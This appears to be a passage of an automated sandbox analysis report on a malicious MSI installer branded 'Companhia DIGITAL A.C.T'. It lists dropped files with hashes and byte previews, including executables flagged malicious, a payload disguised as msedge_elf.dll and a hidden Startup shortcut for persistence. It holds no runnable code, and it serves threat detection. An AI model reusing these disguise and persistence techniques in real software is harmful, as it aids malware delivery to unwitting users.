SHA-512:	2FBBC95C11635EE9258868787D412F96AFC24FC8509BA4C579AC44D98176501A122226FCEDAA5C862D19E2423E7205256084D04BABFCE5298712B51F990E70DE
Malicious:	false
Preview:	...@IXOS.@.....@..#V.@.....@.....@.....@.....@.....@......&.{4DF19C06-EB1F-4F8C-9FDD-36EBD6FE502E}..Companhia DIGITAL A.C.T..DRTO10179793.msi.@.....@.....@.....@........&.{94413F4E-8038-4F75-8820-D526BDEA5DB7}.....@.....@.....@.....@.......@.....@.....@.......@......Companhia DIGITAL A.C.T......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{A79610FE-54C3-458A-B94E-BD8C27ADA02F}&.{4DF19C06-EB1F-4F8C-9FDD-36EBD6FE502E}.@......&.{6959BDEE-9B16-4294-84EA-0854CE48DA3B}&.{4DF19C06-EB1F-4F8C-9FDD-36EBD6FE502E}.@......&.{707E90D8-A51C-4CB8-ADB3-252AD031B13E}&.{4DF19C06-EB1F-4F8C-9FDD-36EBD6FE502E}.@........CreateFolders..Creating folders..Folder: [1]#.S.C:\Users\user\AppData\Roaming\Companhia DIGITAL A.C.T\Companhia DIGITAL A.C.T\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....G.Software\Companhia DIGITAL A.C.T\{4DF19C06-EB1F-4F8C-9FDD-36EBD6

C:\Users\user\AppData\Local\AdvinstAnalytics\63b40ecc97912e61927c21ea\5.3.12.2\tracking.ini

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	4.0081320258334
Encrypted:	false
SSDEEP:	3:1EyEMyvn:1BEN
MD5:	6BC190DD42A169DFA14515484427FC8E
SHA1:	B53BD614A834416E4A20292AA291A6D2FC221A5E
SHA-256:	B3395B660EB1EDB00FF91ECE4596E3ABE99FA558B149200F50AABF2CB77F5087
SHA-512:	5B7011ED628B673217695809A38A800E9C8A42CEB0C54AB6F8BC39DBA0745297A4FBD66D6B09188FCC952C08217152844DFC3ADA7CF468C3AAFCEC379C0B16B6
Malicious:	false
Preview:	[General]..Active = true..

C:\Users\user\AppData\Local\AdvinstAnalytics\63b40ecc97912e61927c21ea\5.3.12.2\{313622DF-58D1-4508-BE49-26CDA366CBBC}.session

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	13770
Entropy (8bit):	5.378717572353259
Encrypted:	false
SSDEEP:	384:xrwr3rNr0rYrGrlrErWarWgrzr4r6rzrWrFrAr/rerlrlrurJr4rSr+hrir3rbvx:xkzhQcCBIyaKgP82XChMrqZhSNEmKGTp
MD5:	B2F8A7037081C0285FD20EE85E3369C5
SHA1:	615449D7036AAB3336A57129A3F78CFA6BBFF5C6
SHA-256:	98CBE4BFB16655107F57F13CBBDA170A44B322877AA78C64C41D1E05E79EC136
SHA-512:	4DC954E5B375FADB479B246D5AFD04139EBB85A1A9600076BA27C9B48B0597AE1D4C85EFE2F5E0656BB615EA4C2D4D0C281FD605B444057AAA1521C4D5C63463
Malicious:	false
Preview:	[Hit {AA07EBCA-7650-4D70-905F-957826FBADEE}]..Queue Time = 0..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 63b40ecc97912e61927c21ea..Application Version = 5.3.12.2..Client ID = FC888238B97E5BCEB3ADDA923462A5C50A254CD3..Session ID = {313622DF-58D1-4508-BE49-26CDA366CBBC}....[Hit {63A15658-579C-4F0C-A630-7541A1188F80}]..Queue Time = 0..Hit Type = property..Label = VersionNT..Value = 1000..Protocol Version = 3..Application ID = 63b40ecc97912e61927c21ea..Application Version = 5.3.12.2..Client ID = FC888238B97E5BCEB3ADDA923462A5C50A254CD3..Session ID = {313622DF-58D1-4508-BE49-26CDA366CBBC}....[Hit {E9120227-ED05-403B-B6EC-9D1CEAB1BFBF}]..Queue Time = 0..Hit Type = property..Label = VersionNT64..Value = 1000..Protocol Version = 3..Application ID = 63b40ecc97912e61927c21ea..Application Version = 5.3.12.2..Client ID = FC888238B97E5BCEB3ADDA923462A5C50A254CD3..Session ID = {313622DF-58D1-4508-BE49-26CDA366CBBC}....[Hit {9319EB00-EE33-4A70-B117-32FF2D543866

C:\Users\user\AppData\Local\Temp\shi7C43.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3015168
Entropy (8bit):	6.488798060334229
Encrypted:	false
SSDEEP:	49152:sS4Q3T9DntJVJZy+PDGffBlj+mBLZESa9cxpy4AiE6CxdNnstH/9hGwQn+rV:x4QpDnDVJZySGfX1uSa9y9evdNnstH/n
MD5:	2BED2F1B8B7975B5F317813B9D2DC150
SHA1:	DC9C89E36F2BC4E01907E0CE698881BB267EAE34
SHA-256:	A1804D8C5127E13C27F664CDD3427C185FAE6ED2AB36108B501859C670F328BD
SHA-512:	49FFB70F169198F1F60C5AB6B15AA535D6905988623DF875A976D3A0ABD5E5EA1F09969B26F50F2E6C56DFC5624BAD84E73CB4238FC9F94B9E252775C691B3EE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: VuDUlvfL3Q.exe, Detection: malicious, Browse Filename: GhjIqAjQKg.exe, Detection: malicious, Browse Filename: 0F9B1A70B9F5DAE682E68E8F0B01F3268013721D4D4FB.exe, Detection: malicious, Browse Filename: 0F9B1A70B9F5DAE682E68E8F0B01F3268013721D4D4FB.exe, Detection: malicious, Browse Filename: ytyNnshVbS.exe, Detection: malicious, Browse Filename: ytyNnshVbS.exe, Detection: malicious, Browse Filename: Levelogger-4.6.2-Installer.exe, Detection: malicious, Browse Filename: Levelogger-4.6.2-Installer.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: qmGoZOH773.exe, Detection: malicious, Browse Filename: B6A0CC1E5488C0C9F1429D1744F8C2F81F7DCE4229B83.exe, Detection: malicious, Browse Filename: NFE__8758787586875858869.msi, Detection: malicious, Browse Filename: NFE98798698BR.msi, Detection: malicious, Browse Filename: DLSP1kcJYo.msi, Detection: malicious, Browse Filename: nXJslq1j2Q.msi, Detection: malicious, Browse Filename: JUV1irsrBU.msi, Detection: malicious, Browse Filename: NFE-655432br.msi, Detection: malicious, Browse Filename: NFE-655432br.msi, Detection: malicious, Browse Filename: onYwrKS2DM.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g....l..l..l.~....l..bo..l..bm..l..bi..l..m.I.l..bh..l..bl..l..bb...l..b...l..bn..l.Rich..l.................PE..L.................!...............P.............c.........................`............@A..........................).K&.......... +...................... -..=...:..T....................N.......#......................e)......................text.....).......)................. ..`.wpp_sf.:.....).......)............. ..`.data...@4........................@....idata..\|/......0.................@..@.didat..H.....+....................@....rsrc........ +....................@..@.reloc...=... -..>....,.............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\shi7D6D.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1299560
Entropy (8bit):	6.717180055414863
Encrypted:	false
SSDEEP:	24576:MhGigXBH4snfDLhfxTdLXWVjpUVAs7ImLKrVA16yiLo+aegfNoZFag9WM1KOn:AGigXBHvfD1f3Li9UVlerVWhNcag97sY
MD5:	84A28C3CF7B811847D74CE68C894FBA0
SHA1:	3140559C1BF1FF76A481C2E264808B3D094008FE
SHA-256:	A95C72F5B9FB9274AC9DAF554B24300E32C5E300AC92B6CE5EC8DB11F5745104
SHA-512:	E1DED6FBA8FC17DAECF97E5B0004FF6064D4403E3B02086CFCB3A2F04C36E7617D96DE9CC993B12AA00B64613BC766E985CEE25F818AC214196B8D16A2BCC2B2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Wh..9;..9;..9;...;..9;..::.9;..=:.9;..8:..9;..<:..9;..8;..9;..7:..9;..9:..9;...;..9;..;:..9;Rich..9;................PE..L..................!.....\|...h............................................... ............@A........................ ........#.. ....`..................hN...P......`...T...................DV.......S............... ...............................text...)\|.......~.................. ..`.text_hf............................ ..`.data...........(..................@....idata..V.... ... ..................@..@.didat..<....@......................@....DDIData.....P......................@....rsrc........`......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.2434251768881515
Encrypted:	false
SSDEEP:	48:rmP8MWaqntl8Oi7xFGJup1ii7OGDuFWdu0uJYKwCKGdadRDmfG16WLXubQb:vMWaq4OmG2ibWTKwndRDeG15N
MD5:	69D0E39199162479C832270BA4E0C35F
SHA1:	DC783436FFA8E258B08F874B572E51CCB52D6130
SHA-256:	1E62C7FD4D0C5A2A3CC087ADBC2A0848A6D7AB7B602AECE138D822721093CBE8
SHA-512:	CE880C338ABA63D73612EBC11DB31A0DC149354D77B930016D2695A130BA31C56EF66DD269BE71ABA47D338DA8F8746C5DC2E9F19B9B4DA2AFD9DB6CCDAA38E8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fQQPwD.lnk

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Nov 3 10:59:34 2022, mtime=Thu Nov 3 10:59:34 2022, atime=Thu Nov 3 10:59:34 2022, length=837032, window=hide
Category:	dropped
Size (bytes):	794
Entropy (8bit):	5.08102638551294
Encrypted:	false
SSDEEP:	12:8m/Qh64GLxbrCQWOVSRjAeJRM1kX2wuLF0xyIfB0xyIfc44t2Y+xIBjKZm:8m8HGLZrPWOoAefM15Eyxy9w7aB6m
MD5:	D9C2FA79390A34F9374811A5E2EA03F2
SHA1:	2D371403AC1BF3BCBE32D8DABBC8ACC8236C80F1
SHA-256:	591FC2B9A67735180BEB43BF728B46DAD1A19EDB8431BBB63D444396BCE37CE0
SHA-512:	6BBE262D63CB13801F56D1C08219DE8BD6FD4A75BF7C7F12ABC3195B59C2FD819AC44E1CEA4FB82057914A9F53216923A7A1671A6D1C5B6079FEF8ADCF2A7651
Malicious:	false
Preview:	L..................F.... ....W..{....W..{....W..{.............................:..DG..Yr?.D..U..k0.&...&......7...#-..:........m..........t. .CFSF..2.....cUq_ .fQQPwD.exe....t.Y^...H.g.3..(.....gVA.G..k...F......cUq_cUq_..............................f.Q.Q.P.w.D...e.x.e...F...L...............-.......K...........U.m}.....C:\Users\user\fQQPwD.exe........\.....\.....\.....\.....\.....\.....\.f.Q.Q.P.w.D...e.x.e...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.........\|....I.J.H..K..:...`.......X.......688098...........!a..%.H.VZAj...=...............!a..%.H.VZAj...=..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\pantaleao.ini

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6
Entropy (8bit):	2.2516291673878226
Encrypted:	false
SSDEEP:	3:gpyn:g4n
MD5:	A067F5EC97BA51B576825B69BC855E58
SHA1:	907D296538A45D5B593512881D721C7D347B8E04
SHA-256:	CF3E339D25C3C023C9417FFC5D8E73F1DA828B18FEECAF14FDB9C24D04E49BA0
SHA-512:	F6058F37CF764E6CD807D9C0E9DE881849E4C94EC1D2E0C0EB504ABF77147E77CB09113B087E1C10E790C3EC45780E5986D29B2A84B364C5F697F884B1549F4D
Malicious:	false
Preview:	NULL..

C:\Users\user\digimn.bz2

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	837032
Entropy (8bit):	6.751145965702434
Encrypted:	false
SSDEEP:	12288:20lZt8vxotK+CUZgGvmABGnbO1oxKfUZK++1s0XHA1lc+eJ+nk+niHX:2pvxotVLZrvmAwnCoxKy1+132uMwX
MD5:	E90BBFCDFDA75CB22FEDF1B94F8F20F6
SHA1:	B7D5E08BDDA5EB5C176570A1622381260E4E2CF6
SHA-256:	37638BE1519246D229D09A3A88A28F5CC18F9985602816DFEC22F5C10A0F754A
SHA-512:	D9A8B3FD34631632A3B6AAD30B106901237E3F74F7CCD759D2D1648A340F04BFCF6A9D1ECFF7E5B7A3E4F7AFBC76979E3E6C2A2C3BBEE73C9D4831927204765C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....bc.........."......D...R....................@..........................@............@.........................x...\...............................'......$r......8...................p.......ha...............................................text...HB.......D.................. ..`.rdata..,....`.......H..............@..@.data....a.......>..................@....00cfg.......p......................@..@.tls................................@....voltbl.\|............ ..................malloc_h.............".............. ..`.rsrc................$..............@..@.reloc..$r.......t...*..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\fQQPwD.exe (copy)

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	837032
Entropy (8bit):	6.751145965702434
Encrypted:	false
SSDEEP:	12288:20lZt8vxotK+CUZgGvmABGnbO1oxKfUZK++1s0XHA1lc+eJ+nk+niHX:2pvxotVLZrvmAwnCoxKy1+132uMwX
MD5:	E90BBFCDFDA75CB22FEDF1B94F8F20F6
SHA1:	B7D5E08BDDA5EB5C176570A1622381260E4E2CF6
SHA-256:	37638BE1519246D229D09A3A88A28F5CC18F9985602816DFEC22F5C10A0F754A
SHA-512:	D9A8B3FD34631632A3B6AAD30B106901237E3F74F7CCD759D2D1648A340F04BFCF6A9D1ECFF7E5B7A3E4F7AFBC76979E3E6C2A2C3BBEE73C9D4831927204765C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....bc.........."......D...R....................@..........................@............@.........................x...\...............................'......$r......8...................p.......ha...............................................text...HB.......D.................. ..`.rdata..,....`.......H..............@..@.data....a.......>..................@....00cfg.......p......................@..@.tls................................@....voltbl.\|............ ..................malloc_h.............".............. ..`.rsrc................$..............@..@.reloc..$r.......t...*..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\fQQPwD.zip

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1907700
Entropy (8bit):	7.9986105720339
Encrypted:	true
SSDEEP:	49152:uLyVVv9Cdt3XwarHODg4q0XplFuoQODFe2lVNi3gK:uGVVv9ut3tZ4TlFDQQFdVNCgK
MD5:	ADC4A5CA2EED9759869CF26E5000F694
SHA1:	E8D2AAFC6BBCFDF566CF9D20B63B4568750FD36D
SHA-256:	9A010E341D7EB63F8B11D8ACD90BDAF5A64263012AFAB203B0B9A6258B22B44A
SHA-512:	D5EC75C679CA36458361119498A8FCEAC0C4044DEE87F3446EBF420A424C9C9B7290E76F79B689B128099BDB9A82447A2628BB54CFEF46833133233C0E0F2B53
Malicious:	false
Preview:	PK........q.cU..<..=..........digimn.bz2.Z{\|.U.?I.>.W.E.8.-...."..-......l..XJ.[je]..i.X....(.]\|..w?."..+i.G.X.......)BZ@hy..~..$i.B......3s.<~.....9.iK....#./.........!....U....)...1f.X..-6.M......s..2..2&NJ1...K.".bN"$Y.NN..3W..@.h"51.$F.2Y..Z..".=L..M..k..b....f..ud...._K.D...>...X.).l...OQ.{..&b.!}.$.I.!......._}.HR.%.^Cr.....1.... ...I..3/-7..A..\|...Ux?.....a....4.C.!..U....9$!an.\|e..h.C.7.^n..,....._..~.!y...9.d.V...Q$.Z...i.;{..?6(..Du ..t..:n...o...r..a.A..T...~c...]%...d..E....f^........d#.Te....Q!.1Y..g=.....A.N.wQ.....K..%zuA..;..C].:....Sa..1%.x.....o...BT..e.2...%F4...9}..r..G.w.~...._.$....BI...s.p7t".>....G.2[U.4..>....[z+....k...................pK>.h.....>...I.h{.........V....N.X9...'hd...!.wf.E ..w3..s...n......;.\|.]....m7.'>.\..$.sIn@.#.....m-...P#......\|...9.k..}........:..>.L."..',%.b.eb.....}...hkh.Ew...Q...-z.Vh{....J........Y.<2...J.G...+..T......5..0j.-...0..S.5....gL..5....5.k....^.d.m3H.......8P.cs..tX....

C:\Users\user\garurumon.bz2

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3058688
Entropy (8bit):	5.809634258463682
Encrypted:	false
SSDEEP:	24576:6VVv8LSvgHTfgmQSZ8cvWz7qbBjXyELEjjsVVv8LLvm3TnfUrJEmsxQY37Q2U4cp:cELzbgmxZvWz72jIj6ELaTetO
MD5:	F84F4D5A2730562CD3B142555771B158
SHA1:	50BDC2FB69FD1C1CC2EFC9B2813ACD6349DF13A1
SHA-256:	7B8CD2BD749FBA1C0ECD1FF323DCAD2033E1E25A2AEEF12DE51A2B6B82C59FDB
SHA-512:	49AFE08FB21ADAAE68AC98D4F9CBE47EC8643F2D264B64D292E68D10D381DB99BB6C403E9E0702BFAFF0A54360BBB172C419224C5AFDE9FA12D5FC204AC9CFE8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c...........!................^N... ...`....@.. .......................`/...........@..........................`..(....N..O....@/.............................................................................. ..................H............text...d.... ...0.................. ..`.sdata.......`.......4..............@....rsrc................6..............@..@.reloc...............<..............@..B.text....g"......h"..>.............. ..`.rsrc........@/.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\msedge_elf.dll (copy)

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3058688
Entropy (8bit):	5.809634258463682
Encrypted:	false
SSDEEP:	24576:6VVv8LSvgHTfgmQSZ8cvWz7qbBjXyELEjjsVVv8LLvm3TnfUrJEmsxQY37Q2U4cp:cELzbgmxZvWz72jIj6ELaTetO
MD5:	F84F4D5A2730562CD3B142555771B158
SHA1:	50BDC2FB69FD1C1CC2EFC9B2813ACD6349DF13A1
SHA-256:	7B8CD2BD749FBA1C0ECD1FF323DCAD2033E1E25A2AEEF12DE51A2B6B82C59FDB
SHA-512:	49AFE08FB21ADAAE68AC98D4F9CBE47EC8643F2D264B64D292E68D10D381DB99BB6C403E9E0702BFAFF0A54360BBB172C419224C5AFDE9FA12D5FC204AC9CFE8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c...........!................^N... ...`....@.. .......................`/...........@..........................`..(....N..O....@/.............................................................................. ..................H............text...d.... ...0.................. ..`.sdata.......`.......4..............@....rsrc................6..............@..@.reloc...............<..............@..B.text....g"......h"..>.............. ..`.rsrc........@/.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\412f31.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {94413F4E-8038-4F75-8820-D526BDEA5DB7}, Number of Words: 10, Subject: Companhia DIGITAL A.C.T, Author: Companhia DIGITAL A.C.T, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1033, Comments: Companhia DIGITAL A.C.T, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	3409408
Entropy (8bit):	6.622017626804443
Encrypted:	false
SSDEEP:	49152:EiDxGSFVtaNXAZK8tKk5ojmrhCMz5vk3ukDln/hFRFNUEekBZWsRkn4frUMXjDtc:dxMXA9Kknz5vquVsRe4frUMXjTY
MD5:	32C752EED98197D9D401A1054BD39009
SHA1:	55371DA49CC341E585735C2616C26676C8A95A56
SHA-256:	03E6328BCD5A3E48DE00C5512D47D2E11C652348AAD299D118E9063142D8AFF0
SHA-512:	82CB48D02E0660D995A63AD37CAB022D5972CCD61BB4CC1E608687FD08556D27817128FDE8303E5838306BB8D547BD7FA9106AB6C4D8FCAAA2A36FF12DADE98E
Malicious:	false
Preview:	......................>...................5...................................................................................................................I...J...K...L...M...N...O...P...Q...R...S...T...............................................................................................................................................................................................................................................................................................................................b...............%...7........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...5...2...3...4...8...6...?...B...9...:...;...<...=...>...Q...@...A...G...C...D...E...F...o...H...a...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`.......c...t...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...u.......v...w...x...y...z...

C:\Windows\Installer\412f34.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {94413F4E-8038-4F75-8820-D526BDEA5DB7}, Number of Words: 10, Subject: Companhia DIGITAL A.C.T, Author: Companhia DIGITAL A.C.T, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1033, Comments: Companhia DIGITAL A.C.T, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	3409408
Entropy (8bit):	6.622017626804443
Encrypted:	false
SSDEEP:	49152:EiDxGSFVtaNXAZK8tKk5ojmrhCMz5vk3ukDln/hFRFNUEekBZWsRkn4frUMXjDtc:dxMXA9Kknz5vquVsRe4frUMXjTY
MD5:	32C752EED98197D9D401A1054BD39009
SHA1:	55371DA49CC341E585735C2616C26676C8A95A56
SHA-256:	03E6328BCD5A3E48DE00C5512D47D2E11C652348AAD299D118E9063142D8AFF0
SHA-512:	82CB48D02E0660D995A63AD37CAB022D5972CCD61BB4CC1E608687FD08556D27817128FDE8303E5838306BB8D547BD7FA9106AB6C4D8FCAAA2A36FF12DADE98E
Malicious:	false
Preview:	......................>...................5...................................................................................................................I...J...K...L...M...N...O...P...Q...R...S...T...............................................................................................................................................................................................................................................................................................................................b...............%...7........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...5...2...3...4...8...6...?...B...9...:...;...<...=...>...Q...@...A...G...C...D...E...F...o...H...a...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`.......c...t...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...u.......v...w...x...y...z...

C:\Windows\Installer\MSI8958.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI8D6F.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	388064
Entropy (8bit):	6.407392408414975
Encrypted:	false
SSDEEP:	6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
MD5:	20C782EB64C81AC14C83A853546A8924
SHA1:	A1506933D294DE07A7A2AE1FBC6BE468F51371D6
SHA-256:	0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
SHA-512:	AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI8E3C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	388064
Entropy (8bit):	6.407392408414975
Encrypted:	false
SSDEEP:	6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
MD5:	20C782EB64C81AC14C83A853546A8924
SHA1:	A1506933D294DE07A7A2AE1FBC6BE468F51371D6
SHA-256:	0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
SHA-512:	AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI90BD.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	388064
Entropy (8bit):	6.407392408414975
Encrypted:	false
SSDEEP:	6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
MD5:	20C782EB64C81AC14C83A853546A8924
SHA1:	A1506933D294DE07A7A2AE1FBC6BE468F51371D6
SHA-256:	0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
SHA-512:	AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI91B8.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
